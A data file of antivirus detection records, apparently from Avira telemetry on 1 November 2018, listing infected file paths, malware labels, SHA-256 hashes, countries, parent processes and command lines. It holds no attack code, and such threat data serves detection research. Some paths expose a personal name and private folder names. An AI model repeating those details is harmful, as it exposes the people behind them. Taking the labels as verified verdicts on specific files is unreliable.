  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3242375\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Pastas do Usuario\\Downloads\\Baixaki_baixar-musicas-gratis_2976929079.exe', parentsize=2202824, timestamp='2018-11-01T00:07:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3887c3f48290daafc572577f74541c2363641c291a3e5c8bafe8b8139d65b716', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\3887C3F48290DAAFC572577F74541C2363641C291A3E5C8BAFE8B8139D65B716', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3887c3f48290daafc572577f74541c2363641c291a3e5c8bafe8b8139d65b716', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:14:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155842-dd1bd261', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155842-DD1BD261', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:42:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\NHML-1.8.1.10\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:l8hiGMlKnE2EiQ\\\\\\/N.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:37:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-082206-b9869d51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15830c6\\AVSCAN-20181101-081149-80057893\\AVSCAN-20181101-082206-B9869D51', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a991124ffdc61b97ef1548bab089a7c63a32316067441dda960b67ab61acaa4a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='_isdel.exe', filepath='N:\\Copia cartek 17_03_15\\Discos utiles\\BMW6.5\\ENG\\_ISDel.exe', filesize=64000, name='W32/Alman.BB.#M1.#R1'), hash='74db3252fbfb556db78b4697ff67b4aa0078323c1707b0ce34f6a63afc01625e', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:01:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123251-ba334be2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123229-A7B240E7\\AVSCAN-20181101-123251-BA334BE2', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:32:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-130903-f85bd481', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-130832-DDA5827D\\AVSCAN-20181101-130903-F85BD481', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:09:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124413-2836cc9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8017edc4\\AVSCAN-20181101-124156-178C771B\\AVSCAN-20181101-124413-2836CC9B', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='d8153cbe750aa7d505ba84c574f9e188fde10a92a400b1d2450b08843a7e1c6f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:44:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T18:52:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dac8c3e6135108f0daff19a1f742b877be0a4b98', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\dac8c3e6135108f0daff19a1f742b877be0a4b98', filesize=1984000, name='W32/Virut.Gen.#M1.#R1'), hash='85b4989a33a7e51e1edede143265822ecf0b08e7ad4b65b94d8a80d61806d50c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\hpScannerEngineAvira\\hpScannerEngineAvira.exe', parentsize=17408, timestamp='2018-11-01T07:45:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\Canon Network Tool_rt\\MSiEXEc64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:26:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nscA92F.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:52:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124507-2ef31e25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124447-1D6A3AA6\\AVSCAN-20181101-124507-2EF31E25', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:45:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='e3c7e5e3630ba621cee96d6361feb9d78b07819e36c1f29de88bafe58465ced1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:53:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112228-51abf40c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112228-51ABF40C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111853-36795436', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111853-36795436', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:18:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a2 bos.xls', filepath='F:\\A2 BOS.xls', filesize=128000, name='X2000M/Agent.91364890.#M1.#R1'), hash='d61dfa33ee5992041e4d344f06de5a7216d9c8187927b8cda918bec20ab38d27', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T02:14:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-074500-5610eae8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_58cdea1d\\AVSCAN-20181101-073845-21B9BF28\\AVSCAN-20181101-074500-5610EAE8', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:45:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T12:44:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d1652185c892b5b6d06cd76d0fcd97b20713f3ab628cf34d8a3690bf4b70e4fd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D1652185C892B5B6D06CD76D0FCD97B20713F3AB628CF34D8A3690BF4B70E4FD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d1652185c892b5b6d06cd76d0fcd97b20713f3ab628cf34d8a3690bf4b70e4fd', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:10:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='201510.exe', filepath='C:\\Users\\X\\Desktop\\Images\\WhatsApp\\201510\\201510.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:IRUtyC\\\\\\/ZIEW+9+\\\\\\/K.1', country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T13:49:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-132829-188f7b00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c3c71778\\AVSCAN-20181101-132816-1621D655\\AVSCAN-20181101-132829-188F7B00', filesize=5644000, name='PUA/OpenCandy.#M1.#R1'), hash='e7c7de9c5a78e67740cc849fcd9d2cc760be1688ffb045d6dd38a0eb286defae', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:28:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191940-9ba74e63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_805ce542\\AVSCAN-20181101-191912-98CE9786\\AVSCAN-20181101-191940-9BA74E63', filesize=768000, name='TR/Dldr.Zampol.739b8a.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:41:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215454-0e485582', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_736ea1e5\\AVSCAN-20181101-215209-E9CD4B59\\AVSCAN-20181101-215454-0E485582', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:54:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-135014-36628cfa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbb7e663\\AVSCAN-20181101-134907-321D1705\\AVSCAN-20181101-135014-36628CFA', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:50:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='01a hm nen mat.xls', filepath='\\\\?\\D:\\A Diep\\16-NHAT ANH - HOANG LONG\\NHAT ANH\\Tran Duy Hung\\01a HM nen mat.xls', filesize=1856000, name='X2000M/Agent.2835988.#M1.#R1'), hash='5bbe88f410f8088cabec27e2f4fc1f0599a74b1b1541ec567a5032408896fa3c', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:09:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='5d9fb282a688991ed4b31b984d69272a53d26e9c349a06892e810aab3e300756', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T21:41:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='150c1ae293ee6c85c21683021670a64ec4944ff46f37c517373a82a958676835', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:56:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101438-49a38a25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db3cca74\\AVSCAN-20181101-094836-1E1E1215\\AVSCAN-20181101-101438-49A38A25', filesize=18944000, name='TR/Taranis.2811.#M1.#R1'), hash='008a4daa92fa915c36a0a30458045ce91e440598b7b696bcf3e28b8032e8c4e4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:44:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003335-80a44dc5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003335-80A44DC5', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:33:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002606-4ffb3159', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002606-4FFB3159', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183817-7f8c4b0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ad6231e\\AVSCAN-20181101-183515-71C35F13\\AVSCAN-20181101-183817-7F8C4B0D', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:38:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:05:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-130839-8d656b53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_356b1c38\\AVSCAN-20181101-130537-7144654A\\AVSCAN-20181101-130839-8D656B53', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T08:08:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fjxhszktc.exe', filepath='E:\\fjxhszktc.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='4760b409daca9e0d5936e8b51c98c7ec7e0ec2d22203f5ce117ae8716a7f3d5e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T06:40:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='1601329d01fedf935c627177d7eef0c04fed2d26869ce2293f76ba19b4c071fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T15:22:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:58:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f4771688.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\asoftech\\DataRecovery\\data\\temp.47\\f4771688.exe', filesize=64000, name='W32/Sality.Patched.#M1.#R1'), hash='3c599ffcdb5e07ffc8a3b6cffeda89d46ae82bfa3c1eb04fa575965019e4360b', metadata=Row(cmdline='\\\\\\/d \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Asoftech\\\\\\\\DataRecovery\\\\\\\\data\\\\\\\\temp\\\\\\" \\\\\\/cmd \\\\\\/dev\\\\\\/sdc fileopt,everything,enable,search', country='BO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Roaming\\asoftech\\DataRecovery\\photo.exe', parentsize=411648, timestamp='2018-11-01T16:06:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105756-cd166755', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b5741c0\\AVSCAN-20181101-105747-CB329746\\AVSCAN-20181101-105756-CD166755', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:58:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T06:21:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='65 руп декоративная косметика и грим.exe', filepath='C:\\Users\\X\\Новая папка\\65 РУП декоративная косметика и грим.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='838530512c259a7b094414b8a9871f005482818430e73742bc607990f6e9ac68', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\EnigmaSoft\\SpyHunter\\ShKernel.exe', parentsize=7737136, timestamp='2018-11-01T07:01:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='6339.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\6339.tmp', filesize=320000, name='TR/AD.MoksSteal.B.#M1.#R1'), hash='536b6bf74f91a0dff0ef00b47ca9e9a5b1a3bbc3b329b8f4d5c0f104fff95a0a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:45:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='69b0f5c04b12d3bbabb62464a98b6821d44f5213d738b885f10ff40f4c56808a', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T10:37:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uepdorimdg.exe', filepath='C:\\Users\\user2\\AppData\\Local\\Temp\\mylbotmslqts\\uepdorimdg.exe', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:27:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152726-c7cafbaa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152726-C7CAFBAA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:27:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api.dll', filepath='\\\\terminal-03\\d\\sp games\\counter-strike source\\bin\\steam_api.dll', filesize=64000, name='W32/Ramnit.C.#M1.#R1'), hash='eed1caac0a746523d36f9fc059b54928a76fda32c7ec79237926658a3d519053', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:27:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904296, timestamp='2018-11-01T13:47:18Z'), dt=datetime.date(2018, 11, 1)),
